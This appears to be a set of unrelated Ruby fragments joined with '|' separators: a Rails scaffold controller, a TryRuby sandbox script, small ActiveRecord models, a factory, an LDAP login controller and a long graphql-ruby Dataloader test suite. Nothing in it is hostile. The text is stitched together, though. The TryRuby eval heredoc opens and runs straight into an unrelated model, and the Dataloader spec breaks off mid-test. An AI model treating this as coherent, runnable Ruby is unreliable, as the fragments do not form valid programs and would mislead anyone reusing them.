# PATCH/PUT /adminsessions/1.json
def update
respond_to do |format|
if @adminsession.update(adminsession_params)
format.html { redirect_to @adminsession, notice: 'Adminsession was successfully updated.' }
format.json { render :show, status: :ok, location: @adminsession }
else
format.html { render :edit }
format.json { render json: @adminsession.errors, status: :unprocessable_entity }
end
end
end
# DELETE /adminsessions/1
# DELETE /adminsessions/1.json
def destroy
@adminsession.destroy
respond_to do |format|
format.html { redirect_to adminsessions_url, notice: 'Adminsession was successfully destroyed.' }
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_adminsession
@adminsession = Adminsession.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def adminsession_params
params.require(:adminsession).permit(:username, :startdatetime, :enddatetime, :ip)
end
end
|
# Test double for $stdout: records every method call and accumulates written
# text so callers can inspect what was printed.
class FakeStdout
  attr_accessor :calls

  def initialize
    @calls = []
    @string = ""
  end

  # Record any unhandled call (puts, print, flush, ...) with its arguments.
  def method_missing(method, *args)
    @calls << {method: method, args: args}
  end

  # IO#write contract: append the text to the internal buffer and record
  # the call. FIX: the original passed the undefined name `strs` to
  # method_missing, raising NameError on every write.
  def write(str)
    @string += str
    method_missing(:write, str)
  end

  # Everything written so far ("" when no call was ever recorded).
  def to_s
    return "" if @calls.empty?
    @string
    # @calls.join("\n")
  end
end
module TryRuby
  # ARGV is expected to carry: the current line, the past command history,
  # and the list of already-required includes.
  # FIX: these were previously assigned to lowercase locals, so the
  # TryRuby::Current_includes constant (referenced by the sandboxed require
  # override later in this file) was never defined; the accompanying
  # `def current_includes<<` method was invalid syntax and has been removed.
  Line, Past_commands, Current_includes = ARGV

  # Reader for the shared include list.
  def current_includes
    Current_includes
  end
end
# Reset ARGV so the sandboxed snippets below never see the host's arguments.
# (Re-assigning an initialized constant like ARGV emits a Ruby warning.)
ARGV = []
# Sample text used by the TryRuby lessons.
poem = <<POEM_EOF
My toast has flown from my hand
And my toast has gone to the
moon.
But when I saw it on television,
Planting our flag on Halley's
comet,
More still did I want to eat it.
POEM_EOF
#def require(path)
# result = ''
# path = path.sub(/\.rb$/, "")
# return false unless ['popup'].include?(path)
# if Object.tryruby_current_includes.include?(path)
# Thread.new do
#
# end.join
# else
# Thread.new do
# result = File.read(path)
# Object.tryruby_current_includes << path
# end.join
# end
# true
#end
# Sandboxed replacement for Kernel#require: only the whitelisted 'popup'
# library may be "required", and only once; everything else returns false.
def require(require_path)
  loaded = false
  Thread.new do
    name = require_path.sub(/\.rb$/, "")
    if ['popup'].include?(name) && !TryRuby::Current_includes.include?(name)
      TryRuby::Current_includes << name
      loaded = true
    end
  end.join
  loaded
end
$stdout = FakeStdout.new
eval( <<EOF
$SAFE=3 |
# Token issued for a formulario; token strings must be unique.
class Token < ActiveRecord::Base
belongs_to :formulario
# NOTE(review): uniqueness validation alone is race-prone; a unique DB index
# on desc_token is the reliable guarantee — confirm the migration has one.
validates_uniqueness_of :desc_token
end
|
# A story has one featured item and is written by a user (as :author).
class Story < ActiveRecord::Base
has_one :lead_item, class_name: 'Item'
belongs_to :author, class_name: 'User'
end
# An item always belongs to a single story.
class Item < ActiveRecord::Base
belongs_to :story
end
# Authors; the inverse side of Story#author.
class User < ActiveRecord::Base
has_many :stories
end
# Post authored by a user; subject and body are required, with length caps
# enforced at the model level.
class Post < ApplicationRecord
belongs_to :user
validates :subject, presence: true, length: { minimum: 1, maximum: 50 }
validates :body, presence: true, length: { minimum: 1, maximum: 2000 }
end
|
# factory_girl (v1-style API) factory for Car records, populated with faked
# company/lorem data and an associated user.
Factory.define(:car) do |f|
f.model { fake(:company, :name) }
f.mark { fake(:company, :name) }
f.vin { fake(:lorem, :word) }
# Cars are always built as exactly ten years old relative to today.
f.production_year { Date.current - 10.years }
f.association(:user)
end
|
# CanCan ability granting read-only access to every resource.
class S3ManifestAbility
include CanCan::Ability
def initialize
can :read, :all
end
end
|
# Session management backed by an LDAP directory (stubbed outside production).
class UsersController < ApplicationController
# Authenticates the posted credentials against LDAP; on success stores the
# user id in the session and issues a month-long token cookie.
def login
return unless params[:username]
authenticator = Rails.env.production? ? SimpleLDAP : SimpleLDAP::Stub
data = authenticator.authenticate(params[:username], params[:password], 'ldap.stuba.sk', 389, 'ou=People,dc=stuba,dc=sk')
if data.nil?
flash[:error] = t(:login_error)
else
# NOTE(review): find_or_create_by_username is handed a Hash, but the
# dynamic finder expects the username value itself — verify this isn't
# matching on the serialized hash.
user = User.find_or_create_by_username(:username => params[:username], :name => data['cn'].first)
session[:user_id] = user.id
cookies[:token] = {:value => user.token, :expires => 1.month.from_now}
flash[:notice] = t(:login_successful)
end
# NOTE(review): redirect_to :back was removed in Rails 5 (use
# redirect_back fallback_location: ...) — confirm the target Rails version.
redirect_to :back
end
# Clears the session and token cookie, then returns to the site root.
def logout
flash[:notice] = t(:logout)
cookies.delete :token
session[:user_id] = nil
redirect_to Page.root.get_path unless Page.root.nil?
redirect_to "/" if Page.root.nil?
end
end
|
# frozen_string_literal: true
require "spec_helper"
require "fiber"
describe GraphQL::Dataloader do
# Test helper that tallies how many batched source calls ran.
class BatchedCallsCounter
  attr_reader :count

  def initialize
    @count = 0
  end

  # Bump the tally by one and return the new total.
  def increment
    @count += 1
  end
end
class FiberSchema < GraphQL::Schema
# In-memory stand-in for a database. Every query is appended to `log` so
# tests can assert on how calls were batched.
module Database
  extend self

  # Seed rows, keyed by id for O(1) mget lookups.
  DATA = [
    { id: "1", name: "Wheat", type: "Grain" },
    { id: "2", name: "Corn", type: "Grain" },
    { id: "3", name: "Butter", type: "Dairy" },
    { id: "4", name: "Baking Soda", type: "LeaveningAgent" },
    { id: "5", name: "Cornbread", type: "Recipe", ingredient_ids: ["1", "2", "3", "4"] },
    { id: "6", name: "Grits", type: "Recipe", ingredient_ids: ["2", "3", "7"] },
    { id: "7", name: "Cheese", type: "Dairy" },
  ].each_with_object({}) { |row, index| index[row[:id]] = row }

  # Ordered record of every query issued.
  def log
    @log ||= []
  end

  # Batch-fetch rows by id (nil entries for unknown ids).
  def mget(ids)
    log << [:mget, ids.sort]
    ids.map { |key| DATA[key] }
  end

  # For each value, find the first row whose `attribute` equals it.
  def find_by(attribute, values)
    log << [:find_by, attribute, values.sort]
    values.map do |value|
      DATA.each_value.find { |row| row[attribute] == value }
    end
  end
end
class DataObject < GraphQL::Dataloader::Source
def initialize(column = :id)
@column = column
end
def fetch(keys)
if @column == :id
Database.mget(keys)
else
Database.find_by(@column, keys)
end
end
end
class NestedDataObject < GraphQL::Dataloader::Source
def fetch(ids)
@dataloader.with(DataObject).load_all(ids)
end
end
class SlowDataObject < GraphQL::Dataloader::Source
def initialize(batch_key)
# This is just so that I can force different instances in test
@batch_key = batch_key
end
def fetch(keys)
t = Thread.new {
sleep 0.5
Database.mget(keys)
}
dataloader.yield
t.value
end
end
class CustomBatchKeySource < GraphQL::Dataloader::Source
def initialize(batch_key)
@batch_key = batch_key
end
def self.batch_key_for(batch_key)
Database.log << [:batch_key_for, batch_key]
# Ignore it altogether
:all_the_same
end
def fetch(keys)
Database.mget(keys)
end
end
class KeywordArgumentSource < GraphQL::Dataloader::Source
def initialize(column:)
@column = column
end
def fetch(keys)
if @column == :id
Database.mget(keys)
else
Database.find_by(@column, keys)
end
end
end
class AuthorizedSource < GraphQL::Dataloader::Source
def initialize(counter)
@counter = counter
end
def fetch(recipes)
@counter && @counter.increment
recipes.map { true }
end
end
module Ingredient
include GraphQL::Schema::Interface
field :name, String, null: false
field :id, ID, null: false
field :name_by_scoped_context, String
def name_by_scoped_context
context[:ingredient_name]
end
end
class Grain < GraphQL::Schema::Object
implements Ingredient
end
class LeaveningAgent < GraphQL::Schema::Object
implements Ingredient
end
class Dairy < GraphQL::Schema::Object
implements Ingredient
end
class Recipe < GraphQL::Schema::Object
def self.authorized?(obj, ctx)
ctx.dataloader.with(AuthorizedSource, ctx[:batched_calls_counter]).load(obj)
end
field :name, String, null: false
field :ingredients, [Ingredient], null: false
def ingredients
ingredients = dataloader.with(DataObject).load_all(object[:ingredient_ids])
ingredients
end
field :slow_ingredients, [Ingredient], null: false
def slow_ingredients
# Use `object[:id]` here to force two different instances of the loader in the test
dataloader.with(SlowDataObject, object[:id]).load_all(object[:ingredient_ids])
end
end
class Query < GraphQL::Schema::Object
field :recipes, [Recipe], null: false
def recipes
Database.mget(["5", "6"])
end
field :ingredient, Ingredient do
argument :id, ID
end
def ingredient(id:)
dataloader.with(DataObject).load(id)
end
field :ingredient_by_name, Ingredient do
argument :name, String
end
def ingredient_by_name(name:)
ing = dataloader.with(DataObject, :name).load(name)
context.scoped_set!(:ingredient_name, "Scoped:#{name}")
ing
end
field :nested_ingredient, Ingredient do
argument :id, ID
end
def nested_ingredient(id:)
dataloader.with(NestedDataObject).load(id)
end
field :slow_recipe, Recipe do
argument :id, ID
end
def slow_recipe(id:)
dataloader.with(SlowDataObject, id).load(id)
end
field :recipe, Recipe do
argument :id, ID, loads: Recipe, as: :recipe
end
def recipe(recipe:)
recipe
end
field :key_ingredient, Ingredient do
argument :id, ID
end
def key_ingredient(id:)
dataloader.with(KeywordArgumentSource, column: :id).load(id)
end
class RecipeIngredientInput < GraphQL::Schema::InputObject
argument :id, ID
argument :ingredient_number, Int
end
field :recipe_ingredient, Ingredient do
argument :recipe, RecipeIngredientInput
end
def recipe_ingredient(recipe:)
recipe_object = dataloader.with(DataObject).load(recipe[:id])
ingredient_idx = recipe[:ingredient_number] - 1
ingredient_id = recipe_object[:ingredient_ids][ingredient_idx]
dataloader.with(DataObject).load(ingredient_id)
end
field :common_ingredients, [Ingredient] do
argument :recipe_1_id, ID
argument :recipe_2_id, ID
end
def common_ingredients(recipe_1_id:, recipe_2_id:)
req1 = dataloader.with(DataObject).request(recipe_1_id)
req2 = dataloader.with(DataObject).request(recipe_2_id)
recipe1 = req1.load
recipe2 = req2.load
common_ids = recipe1[:ingredient_ids] & recipe2[:ingredient_ids]
dataloader.with(DataObject).load_all(common_ids)
end
field :common_ingredients_with_load, [Ingredient], null: false do
argument :recipe_1_id, ID, loads: Recipe
argument :recipe_2_id, ID, loads: Recipe
end
def common_ingredients_with_load(recipe_1:, recipe_2:)
common_ids = recipe_1[:ingredient_ids] & recipe_2[:ingredient_ids]
dataloader.with(DataObject).load_all(common_ids)
end
field :common_ingredients_from_input_object, [Ingredient], null: false do
class CommonIngredientsInput < GraphQL::Schema::InputObject
argument :recipe_1_id, ID, loads: Recipe
argument :recipe_2_id, ID, loads: Recipe
end
argument :input, CommonIngredientsInput
end
def common_ingredients_from_input_object(input:)
recipe_1 = input[:recipe_1]
recipe_2 = input[:recipe_2]
common_ids = recipe_1[:ingredient_ids] & recipe_2[:ingredient_ids]
dataloader.with(DataObject).load_all(common_ids)
end
field :ingredient_with_custom_batch_key, Ingredient do
argument :id, ID
argument :batch_key, String
end
def ingredient_with_custom_batch_key(id:, batch_key:)
dataloader.with(CustomBatchKeySource, batch_key).load(id)
end
field :recursive_ingredient_name, String do
argument :id, ID
end
def recursive_ingredient_name(id:)
res = context.schema.execute("{ ingredient(id: #{id}) { name } }")
res["data"]["ingredient"]["name"]
end
end
query(Query)
class Mutation1 < GraphQL::Schema::Mutation
argument :argument_1, String, prepare: ->(val, ctx) {
raise FieldTestError
}
def resolve(argument_1:)
argument_1
end
end
class Mutation2 < GraphQL::Schema::Mutation
argument :argument_2, String, prepare: ->(val, ctx) {
raise FieldTestError
}
def resolve(argument_2:)
argument_2
end
end
class Mutation3 < GraphQL::Schema::Mutation
argument :label, String
type String
def resolve(label:)
log = context[:mutation_log] ||= []
log << "begin #{label}"
dataloader.with(DataObject).load(1)
log << "end #{label}"
label
end
end
class Mutation < GraphQL::Schema::Object
field :mutation_1, mutation: Mutation1
field :mutation_2, mutation: Mutation2
field :mutation_3, mutation: Mutation3
end
mutation(Mutation)
def self.object_from_id(id, ctx)
if ctx[:use_request]
ctx.dataloader.with(DataObject).request(id)
else
ctx.dataloader.with(DataObject).load(id)
end
end
def self.resolve_type(type, obj, ctx)
get_type(obj[:type])
end
orphan_types(Grain, Dairy, Recipe, LeaveningAgent)
use GraphQL::Dataloader
class FieldTestError < StandardError; end
rescue_from(FieldTestError) do |err, obj, args, ctx, field|
errs = ctx[:errors] ||= []
errs << "FieldTestError @ #{ctx[:current_path]}, #{field.path} / #{ctx[:current_field].path}"
nil
end
end
class UsageAnalyzer < GraphQL::Analysis::AST::Analyzer
def initialize(query)
@query = query
@fields = Set.new
end
def on_enter_field(node, parent, visitor)
args = @query.arguments_for(node, visitor.field_definition)
# This bug has been around for a while,
# see https://github.com/rmosolgo/graphql-ruby/issues/3321
if args.is_a?(GraphQL::Execution::Lazy)
args = args.value
end
@fields << [node.name, args.keys]
end
def result
@fields
end
end
def database_log
FiberSchema::Database.log
end
before do
database_log.clear
end
module DataloaderAssertions
def self.included(child_class)
child_class.class_eval do
it "Works with request(...)" do
res = schema.execute <<-GRAPHQL
{
commonIngredients(recipe1Id: 5, recipe2Id: 6) {
name
}
}
GRAPHQL
expected_data = {
"data" => {
"commonIngredients" => [
{ "name" => "Corn" },
{ "name" => "Butter" },
]
}
}
assert_equal expected_data, res
assert_equal [[:mget, ["5", "6"]], [:mget, ["2", "3"]]], database_log
end
it "runs mutations sequentially" do
res = schema.execute <<-GRAPHQL
mutation {
first: mutation3(label: "first")
second: mutation3(label: "second")
}
GRAPHQL
assert_equal({ "first" => "first", "second" => "second" }, res["data"])
assert_equal ["begin first", "end first", "begin second", "end second"], res.context[:mutation_log]
end
it "batch-loads" do
res = schema.execute <<-GRAPHQL
{
i1: ingredient(id: 1) { id name }
i2: ingredient(id: 2) { name }
r1: recipe(id: 5) {
# This loads Ingredients 3 and 4
ingredients { name }
}
# This loads Ingredient 7
ri1: recipeIngredient(recipe: { id: 6, ingredientNumber: 3 }) {
name
}
}
GRAPHQL
expected_data = {
"i1" => { "id" => "1", "name" => "Wheat" },
"i2" => { "name" => "Corn" },
"r1" => {
"ingredients" => [
{ "name" => "Wheat" },
{ "name" => "Corn" },
{ "name" => "Butter" },
{ "name" => "Baking Soda" },
],
},
"ri1" => {
"name" => "Cheese",
},
}
assert_equal(expected_data, res["data"])
expected_log = [
[:mget, [
"1", "2", # The first 2 ingredients
"5", # The first recipe
"6", # recipeIngredient recipeId
]],
[:mget, [
"7", # recipeIngredient ingredient_id
]],
[:mget, [
"3", "4", # The two unfetched ingredients the first recipe
]],
]
assert_equal expected_log, database_log
end
it "caches and batch-loads across a multiplex" do
context = {}
result = schema.multiplex([
{ query: "{ i1: ingredient(id: 1) { name } i2: ingredient(id: 2) { name } }", },
{ query: "{ i2: ingredient(id: 2) { name } r1: recipe(id: 5) { ingredients { name } } }", },
{ query: "{ i1: ingredient(id: 1) { name } ri1: recipeIngredient(recipe: { id: 5, ingredientNumber: 2 }) { name } }", },
], context: context)
expected_result = [
{"data"=>{"i1"=>{"name"=>"Wheat"}, "i2"=>{"name"=>"Corn"}}},
{"data"=>{"i2"=>{"name"=>"Corn"}, "r1"=>{"ingredients"=>[{"name"=>"Wheat"}, {"name"=>"Corn"}, {"name"=>"Butter"}, {"name"=>"Baking Soda"}]}}},
{"data"=>{"i1"=>{"name"=>"Wheat"}, "ri1"=>{"name"=>"Corn"}}},
]
assert_equal expected_result, result
expected_log = [
[:mget, ["1", "2", "5"]],
[:mget, ["3", "4"]],
]
assert_equal expected_log, database_log
end
it "works with calls within sources" do
res = schema.execute <<-GRAPHQL
{
i1: nestedIngredient(id: 1) { name }
i2: nestedIngredient(id: 2) { name }
}
GRAPHQL
expected_data = { "i1" => { "name" => "Wheat" }, "i2" => { "name" => "Corn" } }
assert_equal expected_data, res["data"]
assert_equal [[:mget, ["1", "2"]]], database_log
end
it "works with batch parameters" do
res = schema.execute <<-GRAPHQL
{
i1: ingredientByName(name: "Butter") { id }
i2: ingredientByName(name: "Corn") { id }
i3: ingredientByName(name: "Gummi Bears") { id }
}
GRAPHQL
expected_data = {
"i1" => { "id" => "3" },
"i2" => { "id" => "2" },
"i3" => nil,
}
assert_equal expected_data, res["data"]
assert_equal [[:find_by, :name, ["Butter", "Corn", "Gummi Bears"]]], database_log
end
it "works with manual parallelism" do
start = Time.now.to_f
schema.execute <<-GRAPHQL
{
i1: slowRecipe(id: 5) { slowIngredients { name } }
i2: slowRecipe(id: 6) { slowIngredients { name } }
}
GRAPHQL
finish = Time.now.to_f
# Each load slept for 0.5 second, so sequentially, this would have been 2s sequentially
assert_in_delta 1, finish - start, 0.1, "Load threads are executed in parallel"
expected_log = [
# These were separated because of different recipe IDs:
[:mget, ["5"]],
[:mget, ["6"]],
# These were cached separately because of different recipe IDs:
[:mget, ["2", "3", "7"]],
[:mget, ["1", "2", "3", "4"]],
]
# Sort them because threads may have returned in slightly different order
assert_equal expected_log.sort, database_log.sort
end
it "Works with multiple-field selections and __typename" do
query_str = <<-GRAPHQL
{
ingredient(id: 1) {
__typename
name
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"ingredient" => {
"__typename" => "Grain",
"name" => "Wheat",
}
}
assert_equal expected_data, res["data"]
end
it "Works when the parent field didn't yield" do
query_str = <<-GRAPHQL
{
recipes {
ingredients {
name
}
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"recipes" =>[
{ "ingredients" => [
{"name"=>"Wheat"},
{"name"=>"Corn"},
{"name"=>"Butter"},
{"name"=>"Baking Soda"}
]},
{ "ingredients" => [
{"name"=>"Corn"},
{"name"=>"Butter"},
{"name"=>"Cheese"}
]},
]
}
assert_equal expected_data, res["data"]
expected_log = [
[:mget, ["5", "6"]],
[:mget, ["1", "2", "3", "4", "7"]],
]
assert_equal expected_log, database_log
end
it "loads arguments in batches, even with request" do
query_str = <<-GRAPHQL
{
commonIngredientsWithLoad(recipe1Id: 5, recipe2Id: 6) {
name
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"commonIngredientsWithLoad" => [
{"name"=>"Corn"},
{"name"=>"Butter"},
]
}
assert_equal expected_data, res["data"]
expected_log = [
[:mget, ["5", "6"]],
[:mget, ["2", "3"]],
]
assert_equal expected_log, database_log
# Run the same test, but using `.request` from object_from_id
database_log.clear
res2 = schema.execute(query_str, context: { use_request: true })
assert_equal expected_data, res2["data"]
assert_equal expected_log, database_log
end
it "works with sources that use keyword arguments in the initializer" do
query_str = <<-GRAPHQL
{
keyIngredient(id: 1) {
__typename
name
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"keyIngredient" => {
"__typename" => "Grain",
"name" => "Wheat",
}
}
assert_equal expected_data, res["data"]
end
it "Works with analyzing arguments with `loads:`, even with .request" do
query_str = <<-GRAPHQL
{
commonIngredientsWithLoad(recipe1Id: 5, recipe2Id: 6) {
name
}
}
GRAPHQL
query = GraphQL::Query.new(schema, query_str)
results = GraphQL::Analysis::AST.analyze_query(query, [UsageAnalyzer])
expected_results = [
["commonIngredientsWithLoad", [:recipe_1, :recipe_2]],
["name", []],
]
assert_equal expected_results, results.first.to_a
query2 = GraphQL::Query.new(schema, query_str, context: { use_request: true })
result2 = nil
query2.context.dataloader.run_isolated do
result2 = GraphQL::Analysis::AST.analyze_query(query2, [UsageAnalyzer])
end
assert_equal expected_results, result2.first.to_a
end
it "Works with input objects, load and request" do
query_str = <<-GRAPHQL
{
commonIngredientsFromInputObject(input: { recipe1Id: 5, recipe2Id: 6 }) {
name
}
}
GRAPHQL
res = schema.execute(query_str)
expected_data = {
"commonIngredientsFromInputObject" => [
{"name"=>"Corn"},
{"name"=>"Butter"},
]
}
assert_equal expected_data, res["data"]
expected_log = [
[:mget, ["5", "6"]],
[:mget, ["2", "3"]],
]
assert_equal expected_log, database_log
# Run the same test, but using `.request` from object_from_id
database_log.clear
res2 = schema.execute(query_str, context: { use_request: true })
assert_equal expected_data, res2["data"]
assert_equal expected_log, database_log
end
it "batches calls in .authorized?" do
query_str = "{ r1: recipe(id: 5) { name } r2: recipe(id: 6) { name } }"
context = { batched_calls_counter: BatchedCallsCounter.new }
schema.execute(query_str, context: context)
assert_equal 1, context[:batched_calls_counter].count
query_str = "{ recipes { name } }"
context = { batched_calls_counter: BatchedCallsCounter.new }
schema.execute(query_str, context: context)
assert_equal 1, context[:batched_calls_counter].count
end
it "Works with input objects using variables, load and request" do
query_str = <<-GRAPHQL
query($input: CommonIngredientsInput!) {
commonIngredientsFromInputObject(input: $input) {
name
}
}
GRAPHQL
res = schema.execute(query_str, variables: { input: { recipe1Id: 5, recipe2Id: 6 }})
expected_data = {
"commonIngredientsFromInputObject" => [
{"name"=>"Corn"},
{"name"=>"Butter"},
]
}
assert_equal expected_data, res["data"]
expected_log = [
[:mget, ["5", "6"]],
[:mget, ["2", "3"]],
]
assert_equal expected_log, database_log
# Run the same test, but using `.request` from object_from_id
database_log.clear
res2 = schema.execute(query_str, context: { use_request: true }, variables: { input: { recipe1Id: 5, recipe2Id: 6 }})
assert_equal expected_data, res2["data"]
assert_equal expected_log, database_log
end
it "supports general usage" do
a = b = c = nil
res = GraphQL::Dataloader.with_dataloading { |dataloader|
dataloader.append_job {
a = dataloader.with(FiberSchema::DataObject).load("1")
}
dataloader.append_job {
b = dataloader.with(FiberSchema::DataObject).load("1")
}
dataloader.append_job {
r1 = dataloader.with(FiberSchema::DataObject).request("2")
r2 = dataloader.with(FiberSchema::DataObject).request("3")
c = [
r1.load,
r2.load
]
}
:finished
}
assert_equal :finished, res
assert_equal [[:mget, ["1", "2", "3"]]], database_log
assert_equal "Wheat", a[:name]
assert_equal "Wheat", b[:name]
assert_equal ["Corn", "Butter"], c.map { |d| d[:name] }
end
it "works with scoped context" do
query_str = <<-GRAPHQL
{
i1: ingredientByName(name: "Corn") { nameByScopedContext }
i2: ingredientByName(name: "Wheat") { nameByScopedContext }
i3: ingredientByName(name: "Butter") { nameByScopedContext }
}
GRAPHQL
expected_data = {
"i1" => { "nameByScopedContext" => "Scoped:Corn" },
"i2" => { "nameByScopedContext" => "Scoped:Wheat" },
"i3" => { "nameByScopedContext" => "Scoped:Butter" },
}
result = schema.execute(query_str)
assert_equal expected_data, result["data"]
end
it "works when the schema calls itself" do
result = schema.execute("{ recursiveIngredientName(id: 1) }")
assert_equal "Wheat", result["data"]["recursiveIngredientName"]
end
it "uses .batch_key_for in source classes" do
query_str = <<-GRAPHQL
{
i1: ingredientWithCustomBatchKey(id: 1, batchKey: "abc") { name }
i2: ingredientWithCustomBatchKey(id: 2, batchKey: "def") { name }
i3: ingredientWithCustomBatchKey(id: 3, batchKey: "ghi") { name }
}
GRAPHQL
res = schema.execute(query_str)
expected_data = { "i1" => { "name" => "Wheat" }, "i2" => { "name" => "Corn" }, "i3" => { "name" => "Butter" } }
assert_equal expected_data, res["data"]
expected_log = [
# Each batch key is given to the source class:
[:batch_key_for, "abc"],
[:batch_key_for, "def"],
[:batch_key_for, "ghi"],
# But since they return the same value,
# all keys are fetched in the same call:
[:mget, ["1", "2", "3"]]
]
assert_equal expected_log, database_log
end
it "uses cached values from .merge" do
query_str = "{ ingredient(id: 1) { id name } }"
assert_equal "Wheat", schema.execute(query_str)["data"]["ingredient"]["name"]
assert_equal [[:mget, ["1"]]], database_log
database_log.clear
dataloader = schema.dataloader_class.new
data_source = dataloader.with(FiberSchema::DataObject)
data_source.merge({ "1" => { name: "Kamut", id: "1", type: "Grain" } })
assert_equal "Kamut", data_source.load("1")[:name]
res = schema.execute(query_str, context: { dataloader: dataloader })
assert_equal [], database_log
assert_equal "Kamut", res["data"]["ingredient"]["name"]
end
end
end
end
let(:schema) { FiberSchema }
include DataloaderAssertions

# Re-run the shared assertions with nonblocking dataloaders when the Ruby
# supports Fiber schedulers (Ruby 3.0+).
if Fiber.respond_to?(:scheduler)
  describe "nonblocking: true" do
    let(:schema) { Class.new(FiberSchema) do
      use GraphQL::Dataloader, nonblocking: true
    end }
    before do
      Fiber.set_scheduler(::DummyScheduler.new)
    end
    after do
      # Always clear the scheduler so other tests aren't affected.
      Fiber.set_scheduler(nil)
    end
    include DataloaderAssertions
  end

  # Same assertions again with the libev-based scheduler; CRuby only, and
  # skipped on CI where the native extension may be unavailable.
  if RUBY_ENGINE == "ruby" && !ENV["GITHUB_ACTIONS"]
    describe "nonblocking: true with libev" do
      require "libev_scheduler"
      let(:schema) { Class.new(FiberSchema) do
        use GraphQL::Dataloader, nonblocking: true
      end }
      before do
        Fiber.set_scheduler(Libev::Scheduler.new)
      end
      after do
        Fiber.set_scheduler(nil)
      end
      include DataloaderAssertions
    end
  end
end
# Regression test for issue #3314: requests made from object_from_id /
# resolvers must be fully resolved (no Lazy leaking into the result).
describe "example from #3314" do
  module Example
    class FooType < GraphQL::Schema::Object
      field :id, ID, null: false
    end

    class FooSource < GraphQL::Dataloader::Source
      # Echoes each id back wrapped in an OpenStruct, so the resolved
      # object's `id` reveals which code path (load vs request) produced it.
      def fetch(ids)
        ids.map { |id| OpenStruct.new(id: id) }
      end
    end

    class QueryType < GraphQL::Schema::Object
      field :foo, Example::FooType do
        argument :foo_id, GraphQL::Types::ID, required: false, loads: Example::FooType
        argument :use_load, GraphQL::Types::Boolean, required: false, default_value: false
      end

      # Exercises both Source APIs: `load` (blocking) and `request` (deferred).
      def foo(use_load: false, foo: nil)
        if use_load
          dataloader.with(Example::FooSource).load("load")
        else
          dataloader.with(Example::FooSource).request("request")
        end
      end
    end

    class Schema < GraphQL::Schema
      query Example::QueryType
      use GraphQL::Dataloader

      # `loads:` arguments go through here; returns a pending request.
      def self.object_from_id(id, ctx)
        ctx.dataloader.with(Example::FooSource).request(id)
      end
    end
  end

  it "loads properly" do
    result = Example::Schema.execute(<<-GRAPHQL)
    {
      foo(useLoad: false, fooId: "Other") {
        __typename
        id
      }
      fooWithLoad: foo(useLoad: true, fooId: "Other") {
        __typename
        id
      }
    }
    GRAPHQL
    # This should not have a Lazy in it
    expected_result = {
      "data" => {
        "foo" => { "id" => "request", "__typename" => "Foo" },
        "fooWithLoad" => { "id" => "load", "__typename" => "Foo" },
      }
    }
    assert_equal expected_result, result.to_h
  end
end
# Schema whose only source always raises; used to verify that errors raised
# inside dataloader fibers reach rescue_from handlers with the field,
# object, and arguments context intact.
class FiberErrorSchema < GraphQL::Schema
  class ErrorObject < GraphQL::Dataloader::Source
    def fetch(_)
      raise ArgumentError, "Nope"
    end
  end

  class Query < GraphQL::Schema::Object
    field :load, String, null: false
    field :load_all, String, null: false
    field :request, String, null: false
    field :request_all, String, null: false

    # Each resolver exercises one Source API entry point; all four paths end
    # up raising inside ErrorObject#fetch.
    def load
      dataloader.with(ErrorObject).load(123)
    end

    def load_all
      dataloader.with(ErrorObject).load_all([123])
    end

    def request
      req = dataloader.with(ErrorObject).request(123)
      req.load
    end

    def request_all
      req = dataloader.with(ErrorObject).request_all([123])
      req.load
    end
  end

  use GraphQL::Dataloader
  query(Query)

  # Record every error into context[:errors] instead of failing the query;
  # returning nil makes the field resolve to null.
  rescue_from(StandardError) do |err, obj, args, ctx, field|
    ctx[:errors] << "#{err.message} (#{field.owner.name}.#{field.graphql_name}, #{obj.inspect}, #{args.inspect})"
    nil
  end
end
# All four Source entry points should funnel their ArgumentError into the
# schema's rescue_from handler, nulling the data and logging each error.
it "Works with error handlers" do
  context = { errors: [] }
  res = FiberErrorSchema.execute("{ load loadAll request requestAll }", context: context)
  expected_errors = [
    "Nope (FiberErrorSchema::Query.load, nil, {})",
    "Nope (FiberErrorSchema::Query.loadAll, nil, {})",
    "Nope (FiberErrorSchema::Query.request, nil, {})",
    "Nope (FiberErrorSchema::Query.requestAll, nil, {})",
  ]
  # FIX: `assert_equal(nil, ...)` is deprecated in minitest (it fails on
  # newer versions); `assert_nil` is the supported assertion.
  assert_nil(res["data"])
  assert_equal(expected_errors, context[:errors].sort)
end
# Mutations raise FieldTestError; the handler should observe the correct
# context[:current_field] for each mutation independently.
it "has proper context[:current_field]" do
  res = FiberSchema.execute("mutation { mutation1(argument1: \"abc\") { __typename } mutation2(argument2: \"def\") { __typename } }")
  assert_equal({"mutation1"=>nil, "mutation2"=>nil}, res["data"])
  expected_errors = [
    "FieldTestError @ [\"mutation1\"], Mutation.mutation1 / Mutation.mutation1",
    "FieldTestError @ [\"mutation2\"], Mutation.mutation2 / Mutation.mutation2",
  ]
  assert_equal expected_errors, res.context[:errors]
end
# throw/catch from inside a dataloader job should propagate out of #run.
it "passes along throws" do
  value = catch(:hello) do
    dataloader = GraphQL::Dataloader.new
    dataloader.append_job do
      throw(:hello, :world)
    end
    dataloader.run
  end
  # BUG FIX: the original `assert :world, value` always passed — it asserts
  # the truthiness of :world and uses `value` as the failure message.
  # assert_equal actually compares the thrown value.
  assert_equal :world, value
end
# Sentinel subclass used below to verify that an explicit
# context[:dataloader] instance is honored over the schema's default.
class CanaryDataloader < GraphQL::Dataloader::NullDataloader
end
it "uses context[:dataloader] when given" do
  # A schema without `use GraphQL::Dataloader` defaults to NullDataloader:
  res = Class.new(GraphQL::Schema) do
    query_type = Class.new(GraphQL::Schema::Object) do
      graphql_name "Query"
    end
    query(query_type)
  end.execute("{ __typename }")
  assert_instance_of GraphQL::Dataloader::NullDataloader, res.context.dataloader
  # A schema with the plugin builds a blocking GraphQL::Dataloader:
  res = FiberSchema.execute("{ __typename }")
  assert_instance_of GraphQL::Dataloader, res.context.dataloader
  refute res.context.dataloader.nonblocking?
  # An explicit context[:dataloader] instance always wins:
  res = FiberSchema.execute("{ __typename }", context: { dataloader: CanaryDataloader.new } )
  assert_instance_of CanaryDataloader, res.context.dataloader
  if Fiber.respond_to?(:scheduler)
    # Nonblocking dataloaders require a fiber scheduler to be installed:
    Fiber.set_scheduler(::DummyScheduler.new)
